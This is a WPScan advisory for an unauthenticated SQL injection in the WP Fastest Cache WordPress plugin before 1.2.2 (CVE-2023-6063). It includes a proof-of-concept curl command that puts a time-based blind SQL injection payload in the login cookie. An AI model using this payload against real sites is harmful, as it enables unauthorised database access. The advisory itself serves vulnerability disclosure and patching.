WordPress Plugin Vulnerabilities

WP Fastest Cache < 1.2.2 - Unauthenticated SQL Injection

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.

Proof of Concept

1. Visit WP Fastest Cache > Settings. Ensure "Cache System" is enabled, and "Logged-in Users" is disabled. Click "Submit" at the bottom.

2. The following curl command demonstrates the SQLi:

curl https://example.com -H "Cookie: wordpress_logged_in=1234%22%20AND%20(SELECT%202537%20FROM%20(SELECT(SLEEP(5)))Sazm)%20AND%20%22qzts%22=%22qzts"

Affects Plugins

Plugin icon
wp-fastest-cache
Fixed in 1.2.2

References

CVE
CVE-2023-6063
URL
https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
https://wpscan.com
Verified
Yes
WPVDB ID
30a74105-8ade-4198-abe2-1c6f2967443e

Timeline

Publicly Published
2023-11-13 (about 6 months ago)
Added
2023-11-13 (about 5 months ago)
Last Updated
2023-11-14 (about 5 months ago)

Other

Published
Title
Published
2014-08-01
Title
Photoracer 1.0 - (id) SQL Injection
Published
2022-10-04
Title
WooCommerce Products Vendor < 2.1.66 - Unauthenticated Blind SQLi
Published
2021-08-22
Title
Create WooCommerce Product Feeds For 40+ Merchants < 3.3.1.0 - Authenticated SQL Injection
Published
2016-07-11
Title
Gallery Photo Gallery < 1.0.1 - SQL Injection
Published
2016-07-19
Title
WordPress Video Player < 1.5.18 - Multiple Authenticated Blind SQL Injection